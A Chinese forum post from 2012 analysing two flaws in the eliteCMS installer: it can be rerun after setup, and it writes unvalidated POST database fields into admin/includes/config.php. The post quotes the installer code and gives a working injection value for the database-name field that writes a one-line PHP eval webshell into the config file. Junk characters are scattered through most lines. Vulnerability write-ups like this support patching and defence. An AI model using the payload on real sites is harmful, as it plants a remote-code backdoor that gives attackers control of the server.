eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
" |( a2 `+ j' \; K* ~9 E$ W3 Q5 `- z' j/ u- O5 C+ k U
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php) i" Y5 O& v! R* x* k) S
我们来看代码:
. t5 I# A( ?! p, }. M7 }# t
2 x7 v: J9 [1 L...3 o8 X- h6 g3 a7 y: n0 E
elseif ($_GET['step'] == "4") {
' I/ I+ b( F& X+ {' S+ Y $file = "../admin/includes/config.php";: o( z0 y) n# C+ r
$write = "<?php\n";" d, a9 L% F2 `& S/ ~
$write .= "/**\n";3 ]. v2 ]1 s5 n) ?. X( H
$write .= "*\n";
9 L$ R# I. w9 ?' u+ r k $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
( P# L* Y5 V$ O% ^...略...! m( e/ z( ^4 [' o Y# U( n
$write .= "*\n";/ F- `* i$ i9 a. l( `! E8 A+ T
$write .= "*/\n";( q1 ^; o4 v! m+ R
$write .= "\n";
4 b! a& Z) D6 }8 o$ Z) I! T) Z. x $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
3 {3 r W9 G) s' @ $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
* n( o" @3 e2 @) v $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";- {0 k( N. `0 @
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
& X, A5 I# B6 t2 W+ a+ { $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";/ y( I' s: w' E; i% c6 C/ [6 b E3 u
$write .= "if (!\$connection) {\n";4 P9 J& d" a$ T3 H; H
$write .= " die(\"Database connection failed\" .mysql_error());\n";
( X2 z' K9 }7 d) q* r6 V $write .= " \n";: s5 ~" s o/ A! R; [* E
$write .= "} \n";
c. R! O) V. m3 @ $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";5 ?& {4 I8 S1 z3 t" J$ O( R' B
$write .= "if (!\$db_select) {\n";5 |0 d3 ]! }8 c h$ y! R0 L
$write .= " die(\"Database select failed\" .mysql_error());\n";. ^* L* {9 M, c1 ]! _. `
$write .= " \n"; H& h2 {1 T o; C5 p
$write .= "} \n";, U0 N9 V' O# x/ i$ e* H: i
$write .= "?>\n";
9 T1 ^8 E( A4 R0 y. P$ Q/ w7 T
0 m/ o J8 ]0 x3 L; F $writer = fopen($file, 'w');* S/ O2 P! k; L) W% [
...
- |8 a: V4 g; a8 B3 x / Q! E! p/ I+ u7 x" V2 w7 b
在看代码:, a, b- L' X" ~! ^% a
0 J+ o# z* {2 v% o' k+ ?$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
/ l7 T; k8 l& I$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
( k: E/ W& |, { U$_SESSION['DB_USER'] = $_POST['DB_USER'];5 E) `6 p, M2 ?
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
9 x7 p$ a+ |- o. h# d' i
* ^1 x& i" q' f取值未作任何验证
- b; Q) D& V& ?4 [7 C9 H如果将数据库名POST数据:
1 O" Z. X9 a. w 9 Y& m1 }- l7 J7 }( E" i
"?><?php eval($_POST[c]);?><?php5 b& S* g+ o/ f' x$ y
2 }( C% X8 f }/ }6 q7 \将导致一句话后门写入/admin/includes/config.php$ i/ K" Q$ ]$ |8 Q, H* f
|
发表于 2012-11-18 13:59:27
收藏
支持
反对